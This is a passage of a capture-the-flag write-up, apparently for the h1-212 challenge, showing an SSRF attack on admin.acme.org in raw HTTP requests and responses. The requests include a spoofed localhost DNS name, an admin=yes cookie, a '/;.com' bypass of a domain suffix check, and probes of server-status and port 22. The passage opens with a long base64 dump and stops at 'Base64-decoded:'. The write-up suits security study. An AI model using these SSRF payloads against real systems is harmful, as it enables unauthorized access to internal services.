ICAgIGZvbnQtd2VpZ2h0OiBib2xkOwogIH0KCiAgZGl2LnBhZ2VfaGVhZGVyIGltZyB7CiAgICBtYXJnaW46IDNweCAwcHggMHB4IDQwcHg7CgogICAgYm9yZGVyOiAwcHggMHB4IDBweDsKICB9CgogIGRpdi50YWJsZV9vZl9jb250ZW50cyB7CiAgICBjbGVhcjogbGVmdDsKCiAgICBtaW4td2lkdGg6IDIwMHB4OwoKICAgIG1hcmdpbjogM3B4IDNweCAzcHggM3B4OwoKICAgIGJhY2tncm91bmQtY29sb3I6ICNGRkZGRkY7CgogICAgdGV4dC1hbGlnbjogbGVmdDsKICB9CgogIGRpdi50YWJsZV9vZl9jb250ZW50c19pdGVtIHsKICAgIGNsZWFyOiBsZWZ0OwoKICAgIHdpZHRoOiAxMDAlOwoKICAgIG1hcmdpbjogNHB4IDBweCAwcHggMHB4OwoKICAgIGJhY2tncm91bmQtY29sb3I6ICNGRkZGRkY7CgogICAgY29sb3I6ICMwMDAwMDA7CiAgICB0ZXh0LWFsaWduOiBsZWZ0OwogIH0KCiAgZGl2LnRhYmxlX29mX2NvbnRlbnRzX2l0ZW0gYSB7CiAgICBtYXJnaW46IDZweCAwcHggMHB4IDZweDsKICB9CgogIGRpdi5jb250ZW50X3NlY3Rpb24gewogICAgbWFyZ2luOiAzcHggM3B4IDNweCAzcHg7CgogICAgYmFja2dyb3VuZC1jb2xvcjogI0ZGRkZGRjsKCiAgICB0ZXh0LWFsaWduOiBsZWZ0OwogIH0KCiAgZGl2LmNvbnRlbnRfc2VjdGlvbl90ZXh0IHsKICAgIHBhZGRpbmc6IDRweCA4cHggNHB4IDhweDsKCiAgICBjb2xvcjogIzAwMDAwMDsKICAgIGZvbnQtc2l6ZTogMTAwJTsKICB9CgogIGRpdi5jb250ZW50X3NlY3Rpb25fdGV4dCBwcmUgewogICAgbWFyZ2luOiA4cHggMHB4IDhweCAwcHg7CiAgICBwYWRkaW5nOiA4cHggOHB4IDhweCA4cHg7CgogICAgYm9yZGVyLXdpZHRoOiAxcHg7CiAgICBib3JkZXItc3R5bGU6IGRvdHRlZDsKICAgIGJvcmRlci1jb2xvcjogIzAwMDAwMDsKCiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjRjVGNkY3OwoKICAgIGZvbnQtc3R5bGU6IGl0YWxpYzsKICB9CgogIGRpdi5jb250ZW50X3NlY3Rpb25fdGV4dCBwIHsKICAgIG1hcmdpbi1ib3R0b206IDZweDsKICB9CgogIGRpdi5jb250ZW50X3NlY3Rpb25fdGV4dCB1bCwgZGl2LmNvbnRlbnRfc2VjdGlvbl90ZXh0IGxpIHsKICAgIHBhZGRpbmc6IDRweCA4cHggNHB4IDE2cHg7CiAgfQoKICBkaXYuc2VjdGlvbl9oZWFkZXIgewogICAgcGFkZGluZzogM3B4IDZweCAzcHggNnB4OwoKICAgIGJhY2tncm91bmQtY29sb3I6ICM4RTlDQjI7CgogICAgY29sb3I6ICNGRkZGRkY7CiAgICBmb250LXdlaWdodDogYm9sZDsKICAgIGZvbnQtc2l6ZTogMTEyJTsKICAgIHRleHQtYWxpZ246IGNlbnRlcjsKICB9CgogIGRpdi5zZWN0aW9uX2hlYWRlcl9yZWQgewogICAgYmFja2dyb3VuZC1jb2xvcjogI0NEMjE0RjsKICB9CgogIGRpdi5zZWN0aW9uX2hlYWRlcl9ncmV5IHsKICAgIGJhY2tncm91bmQtY29sb3I6ICM5RjkzODY7CiAgfQoKICAuZmxvYXRpbmdfZWxlbWVudCB7Ci
AgICBwb3NpdGlvbjogcmVsYXRpdmU7CiAgICBmbG9hdDogbGVmdDsKICB9CgogIGRpdi50YWJsZV9vZl9jb250ZW50c19pdGVtIGEsCiAgZGl2LmNvbnRlbnRfc2VjdGlvbl90ZXh0IGEgewogICAgdGV4dC1kZWNvcmF0aW9uOiBub25lOwogICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgfQoKICBkaXYudGFibGVfb2ZfY29udGVudHNfaXRlbSBhOmxpbmssCiAgZGl2LnRhYmxlX29mX2NvbnRlbnRzX2l0ZW0gYTp2aXNpdGVkLAogIGRpdi50YWJsZV9vZl9jb250ZW50c19pdGVtIGE6YWN0aXZlIHsKICAgIGNvbG9yOiAjMDAwMDAwOwogIH0KCiAgZGl2LnRhYmxlX29mX2NvbnRlbnRzX2l0ZW0gYTpob3ZlciB7CiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjMDAwMDAwOwoKICAgIGNvbG9yOiAjRkZGRkZGOwogIH0KCiAgZGl2LmNvbnRlbnRfc2VjdGlvbl90ZXh0IGE6bGluaywKICBkaXYuY29udGVudF9zZWN0aW9uX3RleHQgYTp2aXNpdGVkLAogICBkaXYuY29udGVudF9zZWN0aW9uX3RleHQgYTphY3RpdmUgewogICAgYmFja2dyb3VuZC1jb2xvcjogI0RDREZFNjsKCiAgICBjb2xvcjogIzAwMDAwMDsKICB9CgogIGRpdi5jb250ZW50X3NlY3Rpb25fdGV4dCBhOmhvdmVyIHsKICAgIGJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7CgogICAgY29sb3I6ICNEQ0RGRTY7CiAgfQoKICBkaXYudmFsaWRhdG9yIHsKICB9CiAgICA8L3N0eWxlPgogIDwvaGVhZD4KICA8Ym9keT4KICAgIDxkaXYgY2xhc3M9Im1haW5fcGFnZSI+CiAgICAgIDxkaXYgY2xhc3M9InBhZ2VfaGVhZGVyIGZsb2F0aW5nX2VsZW1lbnQiPgogICAgICAgIDxpbWcgc3JjPSIvaWNvbnMvdWJ1bnR1LWxvZ28ucG5nIiBhbHQ9IlVidW50dSBMb2dvIiBjbGFzcz0iZmxvYXRpbmdfZWxlbWVudCIvPgogICAgICAgIDxzcGFuIGNsYXNzPSJmbG9hdGluZ19lbGVtZW50Ij4KICAgICAgICAgIEFwYWNoZTIgVWJ1bnR1IERlZmF1bHQgUGFnZQogICAgICAgIDwvc3Bhbj4KICAgICAgPC9kaXY+CjwhLS0gICAgICA8ZGl2IGNsYXNzPSJ0YWJsZV9vZl9jb250ZW50cyBmbG9hdGluZ19lbGVtZW50Ij4KICAgICAgICA8ZGl2IGNsYXNzPSJzZWN0aW9uX2hlYWRlciBzZWN0aW9uX2hlYWRlcl9ncmV5Ij4KICAgICAgICAgIFRBQkxFIE9GIENPTlRFTlRTCiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0idGFibGVfb2ZfY29udGVudHNfaXRlbSBmbG9hdGluZ19lbGVtZW50Ij4KICAgICAgICAgIDxhIGhyZWY9IiNhYm91dCI+QWJvdXQ8L2E+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0idGFibGVfb2ZfY29udGVudHNfaXRlbSBmbG9hdGluZ19lbGVtZW50Ij4KICAgICAgICAgIDxhIGhyZWY9IiNjaGFuZ2VzIj5DaGFuZ2VzPC9hPgogICAgICAgIDwvZGl2PgogICAgICAgIDxkaXYgY2xhc3M9InRhYmxlX29mX2NvbnRlbnRzX2l0ZW0gZmxvYXRpbmdfZWxlbWVudCI+CiAgICAgICAgICA8YSBocmVmPSIjc2NvcGUiPlNjb3BlPC9hPgogICAgICAgIDwvZGl2PgogICAgICAgIDxkaXYgY2xhc3M9InRhYmxlX29mX2NvbnRlbnRzX2l0ZW0gZmxvYXRpbmdfZWxlbWVudCI+CiAgICAgICAgICA8YSBocmVmPSIjZmlsZXMiPkNvbmZpZyBmaWxlczwvYT4KICAgICAgICA8L2Rpdj4KICAgICAgPC9kaXY+Ci0tPgogICAgICA8ZGl2IGNsYXNzPSJjb250ZW50X3NlY3Rpb24gZmxvYXRpbmdfZWxlbWVudCI+CgoKICAgICAgICA8ZGl2IGNsYXNzPSJzZWN0aW9uX2hlYWRlciBzZWN0aW9uX2hlYWRlcl9yZWQiPgogICAgICAgICAgPGRpdiBpZD0iYWJvdXQiPjwvZGl2PgogICAgICAgICAgSXQgd29ya3MhCiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0iY29udGVudF9zZWN0aW9uX3RleHQiPgogICAgICAgICAgPHA+CiAgICAgICAgICAgICAgICBUaGlzIGlzIHRoZSBkZWZhdWx0IHdlbGNvbWUgcGFnZSB1c2VkIHRvIHRlc3QgdGhlIGNvcnJlY3QgCiAgICAgICAgICAgICAgICBvcGVyYXRpb24gb2YgdGhlIEFwYWNoZTIgc2VydmVyIGFmdGVyIGluc3RhbGxhdGlvbiBvbiBVYnVudHUgc3lzdGVtcy4KICAgICAgICAgICAgICAgIEl0IGlzIGJhc2VkIG9uIHRoZSBlcXVpdmFsZW50IHBhZ2Ugb24gRGViaWFuLCBmcm9tIHdoaWNoIHRoZSBVYnVudHUgQXBhY2hlCiAgICAgICAgICAgICAgICBwYWNrYWdpbmcgaXMgZGVyaXZlZC4KICAgICAgICAgICAgICAgIElmIHlvdSBjYW4gcmVhZCB0aGlzIHBhZ2UsIGl0IG1lYW5zIHRoYXQgdGhlIEFwYWNoZSBIVFRQIHNlcnZlciBpbnN0YWxsZWQgYXQKICAgICAgICAgICAgICAgIHRoaXMgc2l0ZSBpcyB3b3JraW5nIHByb3Blcmx5LiBZb3Ugc2hvdWxkIDxiPnJlcGxhY2UgdGhpcyBmaWxlPC9iPiAobG9jYXRlZCBhdAogICAgICAgICAgICAgICAgPHR0Pi92YXIvd3d3L2h0bWwvaW5kZXguaHRtbDwvdHQ+KSBiZWZvcmUgY29udGludWluZyB0byBvcGVyYXRlIHlvdXIgSFRUUCBzZXJ2ZXIuCiAgICAgICAgICA8L3A+CgoKICAgICAgICAgIDxwPgogICAgICAgICAgICAgICAgSWYgeW91IGFyZSBhIG5vcm1hbCB1c2VyIG9mIHRoaXMgd2ViIHNpdGUgYW5kIGRvbid0IGtub3cgd2hhdCB0aGlzIHBhZ2UgaXMKICAgICAgICAgICAgICAgIGFib3V0LCB0aGlzIHByb2JhYmx5IG1lYW5zIHRoYXQgdGhlIHNpdGUgaXMgY3VycmVudGx5IHVuYXZhaWxhYmxlIGR1ZSB0bwogICAgICAgICAgI
CAgICAgbWFpbnRlbmFuY2UuCiAgICAgICAgICAgICAgICBJZiB0aGUgcHJvYmxlbSBwZXJzaXN0cywgcGxlYXNlIGNvbnRhY3QgdGhlIHNpdGUncyBhZG1pbmlzdHJhdG9yLgogICAgICAgICAgPC9wPgoKICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJzZWN0aW9uX2hlYWRlciI+CiAgICAgICAgICA8ZGl2IGlkPSJjaGFuZ2VzIj48L2Rpdj4KICAgICAgICAgICAgICAgIENvbmZpZ3VyYXRpb24gT3ZlcnZpZXcKICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250ZW50X3NlY3Rpb25fdGV4dCI+CiAgICAgICAgICA8cD4KICAgICAgICAgICAgICAgIFVidW50dSdzIEFwYWNoZTIgZGVmYXVsdCBjb25maWd1cmF0aW9uIGlzIGRpZmZlcmVudCBmcm9tIHRoZQogICAgICAgICAgICAgICAgdXBzdHJlYW0gZGVmYXVsdCBjb25maWd1cmF0aW9uLCBhbmQgc3BsaXQgaW50byBzZXZlcmFsIGZpbGVzIG9wdGltaXplZCBmb3IKICAgICAgICAgICAgICAgIGludGVyYWN0aW9uIHdpdGggVWJ1bnR1IHRvb2xzLiBUaGUgY29uZmlndXJhdGlvbiBzeXN0ZW0gaXMKICAgICAgICAgICAgICAgIDxiPmZ1bGx5IGRvY3VtZW50ZWQgaW4KICAgICAgICAgICAgICAgIC91c3Ivc2hhcmUvZG9jL2FwYWNoZTIvUkVBRE1FLkRlYmlhbi5nejwvYj4uIFJlZmVyIHRvIHRoaXMgZm9yIHRoZSBmdWxsCiAgICAgICAgICAgICAgICBkb2N1bWVudGF0aW9uLiBEb2N1bWVudGF0aW9uIGZvciB0aGUgd2ViIHNlcnZlciBpdHNlbGYgY2FuIGJlCiAgICAgICAgICAgICAgICBmb3VuZCBieSBhY2Nlc3NpbmcgdGhlIDxhIGhyZWY9Ii9tYW51YWwiPm1hbnVhbDwvYT4gaWYgdGhlIDx0dD5hcGFjaGUyLWRvYzwvdHQ+CiAgICAgICAgICAgICAgICBwYWNrYWdlIHdhcyBpbnN0YWxsZWQgb24gdGhpcyBzZXJ2ZXIuCgogICAgICAgICAgPC9wPgogICAgICAgICAgPHA+CiAgICAgICAgICAgICAgICBUaGUgY29uZmlndXJhdGlvbiBsYXlvdXQgZm9yIGFuIEFwYWNoZTIgd2ViIHNlcnZlciBpbnN0YWxsYXRpb24gb24gVWJ1bnR1IHN5c3RlbXMgaXMgYXMgZm9sbG93czoKICAgICAgICAgIDwvcD4KICAgICAgICAgIDxwcmU+Ci9ldGMvYXBhY2hlMi8KfC0tIGFwYWNoZTIuY29uZgp8ICAgICAgIGAtLSAgcG9ydHMuY29uZgp8LS0gbW9kcy1lbmFibGVkCnwgICAgICAgfC0tICoubG9hZAp8ICAgICAgIGAtLSAqLmNvbmYKfC0tIGNvbmYtZW5hYmxlZAp8ICAgICAgIGAtLSAqLmNvbmYKfC0tIHNpdGVzLWVuYWJsZWQKfCAgICAgICBgLS0gKi5jb25mCiAgICAgICAgICA8L3ByZT4KICAgICAgICAgIDx1bD4KICAgICAgICAgICAgICAgICAgICAgICAgPGxpPgogICAgICAgICAgICAgICAgICAgICAgICAgICA8dHQ+YXBhY2hlMi5jb25mPC90dD4gaXMgdGhlIG1haW4gY29uZmlndXJhdGlvbgogICAgICAgICAgICAgICAgICAgICAgICAgICBmaWxlLiBJdCBwdXRzIHRoZSBwaWVjZXMgdG9nZXRoZXIgYnkgaW5jbHVkaW5nIGFsbCByZW1haW5pbmcgY29uZmlndXJhdGlvbgogICAgICAgICAgICAgICAgICAgICAgICAgICBmaWxlcyB3aGVuIHN0YXJ0aW5nIHVwIHRoZSB3ZWIgc2VydmVyLgogICAgICAgICAgICAgICAgICAgICAgICA8L2xpPgoKICAgICAgICAgICAgICAgICAgICAgICAgPGxpPgogICAgICAgICAgICAgICAgICAgICAgICAgICA8dHQ+cG9ydHMuY29uZjwvdHQ+IGlzIGFsd2F5cyBpbmNsdWRlZCBmcm9tIHRoZQogICAgICAgICAgICAgICAgICAgICAgICAgICBtYWluIGNvbmZpZ3VyYXRpb24gZmlsZS4gSXQgaXMgdXNlZCB0byBkZXRlcm1pbmUgdGhlIGxpc3RlbmluZyBwb3J0cyBmb3IKICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5jb21pbmcgY29ubmVjdGlvbnMsIGFuZCB0aGlzIGZpbGUgY2FuIGJlIGN1c3RvbWl6ZWQgYW55dGltZS4KICAgICAgICAgICAgICAgICAgICAgICAgPC9saT4KCiAgICAgICAgICAgICAgICAgICAgICAgIDxsaT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgQ29uZmlndXJhdGlvbiBmaWxlcyBpbiB0aGUgPHR0Pm1vZHMtZW5hYmxlZC88L3R0PiwKICAgICAgICAgICAgICAgICAgICAgICAgICAgPHR0PmNvbmYtZW5hYmxlZC88L3R0PiBhbmQgPHR0PnNpdGVzLWVuYWJsZWQvPC90dD4gZGlyZWN0b3JpZXMgY29udGFpbgogICAgICAgICAgICAgICAgICAgICAgICAgICBwYXJ0aWN1bGFyIGNvbmZpZ3VyYXRpb24gc25pcHBldHMgd2hpY2ggbWFuYWdlIG1vZHVsZXMsIGdsb2JhbCBjb25maWd1cmF0aW9uCiAgICAgICAgICAgICAgICAgICAgICAgICAgIGZyYWdtZW50cywgb3IgdmlydHVhbCBob3N0IGNvbmZpZ3VyYXRpb25zLCByZXNwZWN0aXZlbHkuCiAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+CgogICAgICAgICAgICAgICAgICAgICAgICA8bGk+CiAgICAgICAgICAgICAgICAgICAgICAgICAgIFRoZXkgYXJlIGFjdGl2YXRlZCBieSBzeW1saW5raW5nIGF2YWlsYWJsZQogICAgICAgICAgICAgICAgICAgICAgICAgICBjb25maWd1cmF0aW9uIGZpbGVzIGZyb20gdGhlaXIgcmVzcGVjdGl2ZQogICAgICAgICAgICAgICAgICAgICAgICAgICAqLWF2YWlsYWJsZS8gY291bnRlcnBhcnRzLiBUaGVzZSBzaG91bGQgYmUgbWFuYWdlZAogICAgICAgICAgICAgICAgICAgICAgICAgICBieSB1c2luZyBvdXIgaGVscGVycwogICAgICAgICAgICAgICAgICAg
ICAgICAgICA8dHQ+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iaHR0cDovL21hbnBhZ2VzLmRlYmlhbi5vcmcvY2dpLWJpbi9tYW4uY2dpP3F1ZXJ5PWEyZW5tb2QiPmEyZW5tb2Q8L2E+LAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxhIGhyZWY9Imh0dHA6Ly9tYW5wYWdlcy5kZWJpYW4ub3JnL2NnaS1iaW4vbWFuLmNnaT9xdWVyeT1hMmRpc21vZCI+YTJkaXNtb2Q8L2E+LAogICAgICAgICAgICAgICAgICAgICAgICAgICA8L3R0PgogICAgICAgICAgICAgICAgICAgICAgICAgICA8dHQ+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iaHR0cDovL21hbnBhZ2VzLmRlYmlhbi5vcmcvY2dpLWJpbi9tYW4uY2dpP3F1ZXJ5PWEyZW5zaXRlIj5hMmVuc2l0ZTwvYT4sCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iaHR0cDovL21hbnBhZ2VzLmRlYmlhbi5vcmcvY2dpLWJpbi9tYW4uY2dpP3F1ZXJ5PWEyZGlzc2l0ZSI+YTJkaXNzaXRlPC9hPiwKICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdHQ+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYW5kCiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0dD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSJodHRwOi8vbWFucGFnZXMuZGViaWFuLm9yZy9jZ2ktYmluL21hbi5jZ2k\/cXVlcnk9YTJlbmNvbmYiPmEyZW5jb25mPC9hPiwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSJodHRwOi8vbWFucGFnZXMuZGViaWFuLm9yZy9jZ2ktYmluL21hbi5jZ2k\/cXVlcnk9YTJkaXNjb25mIj5hMmRpc2NvbmY8L2E+CiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdHQ+LiBTZWUgdGhlaXIgcmVzcGVjdGl2ZSBtYW4gcGFnZXMgZm9yIGRldGFpbGVkIGluZm9ybWF0aW9uLgogICAgICAgICAgICAgICAgICAgICAgICA8L2xpPgoKICAgICAgICAgICAgICAgICAgICAgICAgPGxpPgogICAgICAgICAgICAgICAgICAgICAgICAgICBUaGUgYmluYXJ5IGlzIGNhbGxlZCBhcGFjaGUyLiBEdWUgdG8gdGhlIHVzZSBvZgogICAgICAgICAgICAgICAgICAgICAgICAgICBlbnZpcm9ubWVudCB2YXJpYWJsZXMsIGluIHRoZSBkZWZhdWx0IGNvbmZpZ3VyYXRpb24sIGFwYWNoZTIgbmVlZHMgdG8gYmUKICAgICAgICAgICAgICAgICAgICAgICAgICAgc3RhcnRlZC9zdG9wcGVkIHdpdGggPHR0Pi9ldGMvaW5pdC5kL2FwYWNoZTI8L3R0PiBvciA8dHQ+YXBhY2hlMmN0bDwvdHQ+LgogICAgICAgICAgICAgICAgICAgICAgICAgICA8Yj5DYWxsaW5nIDx0dD4vdXNyL2Jpbi9hcGFjaGUyPC90dD4gZGlyZWN0bHkgd2lsbCBub3Qgd29yazwvYj4gd2l0aCB0aGUKICAgICAgICAgICAgICAgICAgICAgICAgICAgZGVmYXVsdCBjb25maWd1cmF0aW9uLgogICAgICAgICAgICAgICAgICAgICAgICA8L2xpPgogICAgICAgICAgPC91bD4KICAgICAgICA8L2Rpdj4KCiAgICAgICAgPGRpdiBjbGFzcz0ic2VjdGlvbl9oZWFkZXIiPgogICAgICAgICAgICA8ZGl2IGlkPSJkb2Nyb290Ij48L2Rpdj4KICAgICAgICAgICAgICAgIERvY3VtZW50IFJvb3RzCiAgICAgICAgPC9kaXY+CgogICAgICAgIDxkaXYgY2xhc3M9ImNvbnRlbnRfc2VjdGlvbl90ZXh0Ij4KICAgICAgICAgICAgPHA+CiAgICAgICAgICAgICAgICBCeSBkZWZhdWx0LCBVYnVudHUgZG9lcyBub3QgYWxsb3cgYWNjZXNzIHRocm91Z2ggdGhlIHdlYiBicm93c2VyIHRvCiAgICAgICAgICAgICAgICA8ZW0+YW55PC9lbT4gZmlsZSBhcGFydCBvZiB0aG9zZSBsb2NhdGVkIGluIDx0dD4vdmFyL3d3dzwvdHQ+LAogICAgICAgICAgICAgICAgPGEgaHJlZj0iaHR0cDovL2h0dHBkLmFwYWNoZS5vcmcvZG9jcy8yLjQvbW9kL21vZF91c2VyZGlyLmh0bWwiPnB1YmxpY19odG1sPC9hPgogICAgICAgICAgICAgICAgZGlyZWN0b3JpZXMgKHdoZW4gZW5hYmxlZCkgYW5kIDx0dD4vdXNyL3NoYXJlPC90dD4gKGZvciB3ZWIKICAgICAgICAgICAgICAgIGFwcGxpY2F0aW9ucykuIElmIHlvdXIgc2l0ZSBpcyB1c2luZyBhIHdlYiBkb2N1bWVudCByb290CiAgICAgICAgICAgICAgICBsb2NhdGVkIGVsc2V3aGVyZSAoc3VjaCBhcyBpbiA8dHQ+L3NydjwvdHQ+KSB5b3UgbWF5IG5lZWQgdG8gd2hpdGVsaXN0IHlvdXIKICAgICAgICAgICAgICAgIGRvY3VtZW50IHJvb3QgZGlyZWN0b3J5IGluIDx0dD4vZXRjL2FwYWNoZTIvYXBhY2hlMi5jb25mPC90dD4uCiAgICAgICAgICAgIDwvcD4KICAgICAgICAgICAgPHA+CiAgICAgICAgICAgICAgICBUaGUgZGVmYXVsdCBVYnVudHUgZG9jdW1lbnQgcm9vdCBpcyA8dHQ+L3Zhci93d3cvaHRtbDwvdHQ+LiBZb3UKICAgICAgICAgICAgICAgIGNhbiBtYWtlIHlvdXIgb3duIHZpcnR1YWwgaG9zdHMgdW5kZXIgL3Zhci93d3cuIFRoaXMgaXMgZGlmZmVyZW50CiAgICAgICAgICAgICAgICB0byBwcmV2aW91cyByZWxlYXNlcyB3aGljaCBwcm92aWRlcyBiZXR0ZXIgc2VjdXJpdHkgb3V0IG9mIHRoZSBib3guCiAgICAgICAgICAgIDwvcD4KICAgICAgICA8L2Rpdj4KCiAgICAgICAgPGRpdiBjbGFzcz0ic2VjdGlvbl9oZWFkZXIiPgogICAgICAgICAgPGRpdiBpZD0iYnVncyI+PC9kaXY+CiAgICAgICAgICAgICAgICBSZXBvc
nRpbmcgUHJvYmxlbXMKICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250ZW50X3NlY3Rpb25fdGV4dCI+CiAgICAgICAgICA8cD4KICAgICAgICAgICAgICAgIFBsZWFzZSB1c2UgdGhlIDx0dD51YnVudHUtYnVnPC90dD4gdG9vbCB0byByZXBvcnQgYnVncyBpbiB0aGUKICAgICAgICAgICAgICAgIEFwYWNoZTIgcGFja2FnZSB3aXRoIFVidW50dS4gSG93ZXZlciwgY2hlY2sgPGEKICAgICAgICAgICAgICAgIGhyZWY9Imh0dHBzOi8vYnVncy5sYXVuY2hwYWQubmV0L3VidW50dS8rc291cmNlL2FwYWNoZTIiPmV4aXN0aW5nCiAgICAgICAgICAgICAgICBidWcgcmVwb3J0czwvYT4gYmVmb3JlIHJlcG9ydGluZyBhIG5ldyBidWcuCiAgICAgICAgICA8L3A+CiAgICAgICAgICA8cD4KICAgICAgICAgICAgICAgIFBsZWFzZSByZXBvcnQgYnVncyBzcGVjaWZpYyB0byBtb2R1bGVzIChzdWNoIGFzIFBIUCBhbmQgb3RoZXJzKQogICAgICAgICAgICAgICAgdG8gcmVzcGVjdGl2ZSBwYWNrYWdlcywgbm90IHRvIHRoZSB3ZWIgc2VydmVyIGl0c2VsZi4KICAgICAgICAgIDwvcD4KICAgICAgICA8L2Rpdj4KCgoKCiAgICAgIDwvZGl2PgogICAgPC9kaXY+CiAgICA8ZGl2IGNsYXNzPSJ2YWxpZGF0b3IiPgogICAgPC9kaXY+CiAgPC9ib2R5Pgo8L2h0bWw+Cgo="}

What was even more interesting here is that the listening dnschef actually received a remote DNS lookup request for “h1-212.rcesec.com” just as a consequence of the read.php call, which it successfully spoofed to “127.0.0.1”:

While this was the confirmation that the application actively interacts with the given “domain” value, there was also a second confirmation in the form of the base64-encoded string returned in the response body, which was (when decoded) the actual content of the web server listening on “localhost”:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <!--
    Modified from the Debian original for Ubuntu
    Last updated: 2014-03-19
    See: https://launchpad.net/bugs/1288690
  -->
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Apache2 Ubuntu Default Page: It works</title>
    <style type="text/css" media="screen">
  * {
    margin: 0px 0px 0px 0px;
    padding: 0px 0px 0px 0px;
  }
[...]

The Wrong Direction

While I was at first somehow convinced that the flag had to reside somewhere on the localhost (due to a thrill of anticipation probably? ;-) ), I first wanted to retrieve the contents of Apache’s server-status page (which is usually only reachable from localhost) to potentially fetch the flag from there. However, when trying to query that page using the following request (remember: “h1-212.rcesec.com” did actually resolve to “127.0.0.1”, which applied to all further requests):

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 44

{"domain":"h1-212.rcesec.com/server-status"}

The application just returned an error, indicating that there was at least a very basic validation of the domain name in place, requiring the domain value to end with the string “.com”:

HTTP/1.1 418 I'm a teapot
Date: Wed, 15 Nov 2017 07:32:32 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 60
Connection: close
Content-Type: application/json

{"error":{"domain":"incorrect value, .com domain expected"}}

Bypassing the Domain Validation (Part 1)

OK, so the application expected the domain to end with “.com”. While trying to bypass this in common ways, e.g. using “?”:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 49

{"domain":"h1-212.rcesec.com/server-status?.com"}

The application always responded with:

HTTP/1.1 418 I'm a teapot
Date: Wed, 15 Nov 2017 07:37:15 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 46
Connection: close
Content-Type: application/json

{"error":{"domain":"domain cannot contain ?"}}

The same applies to “&”, “#” and (double-) URL-encoded representations of them. However, when a semicolon was used:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 50

{"domain":"h1-212.rcesec.com/server-status/;.com"}

The application responded again with a reference to the read.php file:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 07:39:36 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8

{"next":"\/read.php?id=3"}

Following that one indeed returned a base64-encoded string of the server-status output:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 07:40:33 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 50180
Connection: close
Content-Type: text/html; charset=UTF-8

{"data":"PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURC *CENSORED*"}

While I was thinking “yeah, I finally got it”, it turned out that there wasn’t a flag anywhere. Although I guess the engineer didn’t intend to expose the Apache status page at all either ;-) :

The Right Direction

While I was poking around on the localhost to find the flag for a while without any luck, I decided to go a different way and use the discovered SSRF vulnerability to see whether there are any other open ports listening on localhost which are otherwise not visible from the outside. To be clear: a port scan from the Internet on the target host only revealed the open ports 22 and 80:

Since port 22 was known to be open, the SSRF vulnerability could easily be used to verify whether this port can also be reached via localhost:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 38

{"domain":"h1-212.rcesec.com:22;.com"}

This returned the following output (after querying the read.php file again):

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 08:07:48 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 91
Connection: close
Content-Type: text/html; charset=UTF-8

{"data":"U1NILTIuMC1PcGVuU1NIXzcuMnAyIFVidW50dS00dWJ1bnR1Mi4yDQpQcm90b2NvbCBtaXNtYXRjaC4K"}

Base64-decoded:

